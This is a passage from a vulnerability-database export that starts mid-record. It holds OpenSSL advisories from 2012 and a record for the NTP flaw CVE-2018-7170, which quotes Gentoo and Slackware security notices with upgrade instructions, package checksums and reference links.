Can Cause Assertion Failures (CVE-2011-4577)\n====================================================================\n\nRFC 3779 data can be included in certificates, and if it is malformed,\nmay trigger an assertion failure. This could be used in a\ndenial-of-service attack. \n\nNote, however, that in the standard release of OpenSSL, RFC 3779\nsupport is disabled by default, and in this case OpenSSL is not\nvulnerable. Builds of OpenSSL are vulnerable if configured with \n\"enable-rfc3779\". \n\nThanks to Andrew Chi, BBN Technologies, for discovering the flaw, and\nRob Austein \u003csra@hactrn.net\u003e for fixing it. \n\nAffected users should upgrade to OpenSSL 1.0.0f or 0.9.8s. \n\nSGC Restart DoS Attack (CVE-2011-4619)\n======================================\n\nSupport for handshake restarts for server gated cryptograpy (SGC) can\nbe used in a denial-of-service attack. \n\nThanks to George Kadianakis \u003cdesnacked@gmail.com\u003e for identifying\nthis issue and to Adam Langley \u003cagl@chromium.org\u003e for fixing it. \n\nAffected users should upgrade to OpenSSL 1.0.0f or 0.9.8s. \nThis could be used in a denial-of-service attack. \n\nOnly users of the OpenSSL GOST ENGINE are affected by this bug. \n\nThanks to Andrey Kulikov \u003camdeich@gmail.com\u003e for identifying and fixing\nthis issue. \n\nAffected users should upgrade to OpenSSL 1.0.0f. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20120104.txt\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0027" }, { "db": "CERT/CC", "id": "VU#737740" }, { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "BID", "id": "51281" }, { "db": "VULMON", "id": "CVE-2012-0027" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" } ], "trust": 3.24 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0027", "trust": 3.4 }, { "db": "CERT/CC", "id": "VU#737740", "trust": 1.1 }, { "db": "OSVDB", "id": "78191", "trust": 1.1 }, { "db": "SECUNIA", "id": "57353", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2012-001022", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201201-062", "trust": 0.6 }, { "db": "BID", "id": "51281", "trust": 0.4 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2012-0027", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "121573", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "114272", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "110482", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109614", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "108735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169679", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2012-0027" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "NVD", "id": "CVE-2012-0027" }, { "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "id": "VAR-201201-0049", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2023-12-18T10:57:02.054000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "DTLS Plaintext Recovery Attack", "trust": 0.8, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "title": "Multiple vulnerabilities in OpenSSL", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl" }, { "title": "openssl-1.0.0f", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=42348" }, { "title": "openssl-0.9.8s", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=42347" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1357-1" }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-0027" }, { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "NVD", "id": "CVE-2012-0027" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "trust": 1.4, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004564" }, { "trust": 1.1, "url": "http://w3.efi.com/fiery" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:007" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00017.html" }, { "trust": 1.1, "url": "http://osvdb.org/78191" }, { "trust": 1.1, "url": "http://secunia.com/advisories/57353" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0027" }, { "trust": 0.8, "url": "http://www.support.xerox.com/support/docucolor-242-252-260/downloads/enus.html?associatedproduct=fiery-exp260\u0026operatingsystem=win7x64" }, { "trust": 0.8, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0027" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4619" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0027" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4109" }, { "trust": 0.3, "url": "http://www.attachmate.com/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001530" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001529" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_potential_security_exposure_when_using_ibm_infosphere_streams_due_to_vulnerabilities_in_ibm_java_se_version_6_sdk6?lang=en_us" }, { "trust": 0.3, "url": "https://www14.software.ibm.com/webapp/iwm/web/prelogin.do?source=aixbp" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157565" }, { "trust": 0.3, "url": "http://blog.pfsense.org/?p=676" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21637929" }, { "trust": 0.3, "url": "https://www.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_tivoli_netcool_system_service_monitors_application_service_monitors_is_affected_by_multiple_openssl_vulnerabilities?lang=en_us" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/1708.html" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/2502.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631429" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21626257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651196" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "http://support.apple.com/kb/ht5784" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156631" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157969" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161892" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161590" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650623" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643698" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas12088ececb530423186257b410072035e" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03383940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638022" }, { "trust": 0.3, "url": "https://www.ibm.com/support/docview.wss?uid=swg21619837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631322" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001560" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24030251" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033501" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004323" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory3.asc" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2012-1306.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2012-1307.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2012-1308.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643442" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21625170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651176" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21627934" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638670" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643439" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643437" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15314.html" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15388.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15389.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15395.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15460.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15461.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643316" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2012-0013.html" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/737740" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100158312" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100150578" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100156392" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0036" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2016" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0057" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4078" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0031" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1165" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4885" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4317" }, { "trust": 0.2, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2014" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0830" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4153" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1823" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2013" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4415" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3607" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0021" }, { "trust": 0.2, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0053" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2012" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2015" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3379" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0050" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1357-1/" }, { "trust": 0.1, "url": "https://www.securityfocus.com/bid/51281" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-ac3d1f80b8dd48b792bfc01a08" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetail" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4577" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4576" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0027" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4619" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0050" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201203-12.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4109" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4108" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8g-4ubuntu3.15" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3210" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1357-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1945" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-1ubuntu4.6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4354" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-5ubuntu1.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.8" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.0e-2ubuntu4.2" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4108" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4576" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4619" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4109" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "http://www.isg.rhul.ac.uk/~kp/dtls.pdf" }, { "trust": 0.1, "url": "https://www.isg.rhul.ac.uk)" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2012-0027" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "NVD", "id": "CVE-2012-0027" }, { "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2012-0027" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "NVD", "id": "CVE-2012-0027" }, { "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-03-18T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2012-01-06T00:00:00", "db": "VULMON", "id": "CVE-2012-0027" }, { "date": "2012-01-05T00:00:00", "db": "BID", "id": "51281" }, { "date": "2012-01-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "date": "2013-05-09T14:44:00", "db": "PACKETSTORM", "id": "121573" }, { "date": "2012-06-28T03:39:12", "db": "PACKETSTORM", "id": "114272" }, { "date": "2012-03-06T23:57:33", "db": "PACKETSTORM", "id": "110482" }, { "date": "2012-02-10T07:44:13", "db": "PACKETSTORM", "id": "109614" }, { "date": "2012-01-17T01:20:23", "db": "PACKETSTORM", "id": "108735" }, { "date": "2012-01-04T12:12:12", "db": "PACKETSTORM", "id": "169679" }, { "date": "2012-01-06T01:55:01.050000", "db": "NVD", "id": "CVE-2012-0027" }, { "date": "2012-01-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-05-02T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2014-03-26T00:00:00", "db": "VULMON", "id": "CVE-2012-0027" }, { "date": "2015-04-13T21:31:00", "db": "BID", "id": "51281" }, { "date": "2012-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "date": "2014-03-26T04:27:05.177000", "db": "NVD", "id": "CVE-2012-0027" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "CNNVD", "id": "CNNVD-201201-062" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL", "sources": [ { "db": "CERT/CC", "id": "VU#737740" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201201-062" } ], "trust": 0.6 } }
var-201803-1837
Vulnerability from variot
ntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim's clock via a Sybil attack. This issue exists because of an incomplete fix for CVE-2016-1549. ntp Contains data processing vulnerabilities and key management errors. NTP is prone to a remote security vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and perform some unauthorized actions to the application. This may aid in further attacks. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ntpd is one of the operating system daemons. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201805-12
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: May 26, 2018 Bugs: #649612 ID: 201805-12
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to remote code execution.
Background
NTP contains software for the Network Time Protocol.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p11 >= 4.2.8_p11
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could possibly execute arbitrary code or cause a Denial of Service condition.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p11"
References
[ 1 ] CVE-2018-7170 https://nvd.nist.gov/vuln/detail/CVE-2018-7170 [ 2 ] CVE-2018-7182 https://nvd.nist.gov/vuln/detail/CVE-2018-7182 [ 3 ] CVE-2018-7183 https://nvd.nist.gov/vuln/detail/CVE-2018-7183 [ 4 ] CVE-2018-7184 https://nvd.nist.gov/vuln/detail/CVE-2018-7184 [ 5 ] CVE-2018-7185 https://nvd.nist.gov/vuln/detail/CVE-2018-7185
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201805-12
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] ntp (SSA:2018-060-02)
New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix security issues.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded. This release addresses five security issues in ntpd: * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability: ephemeral association attack. While fixed in ntp-4.2.8p7, there are significant additional protections for this issue in 4.2.8p11. Reported by Matt Van Gundy of Cisco. * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer read overrun leads to undefined behavior and information leak. Reported by Yihan Lian of Qihoo 360. * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated ephemeral associations. Reported on the questions@ list. * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet can reset authenticated interleaved association. Reported by Miroslav Lichvar of Red Hat. For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: 01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: b2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz
Slackware 14.1 package: 78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz
Slackware 14.2 package: 81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz
Slackware x86_64 14.2 package: d2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz
Slackware -current package: c3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz
Slackware x86_64 -current package: fa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
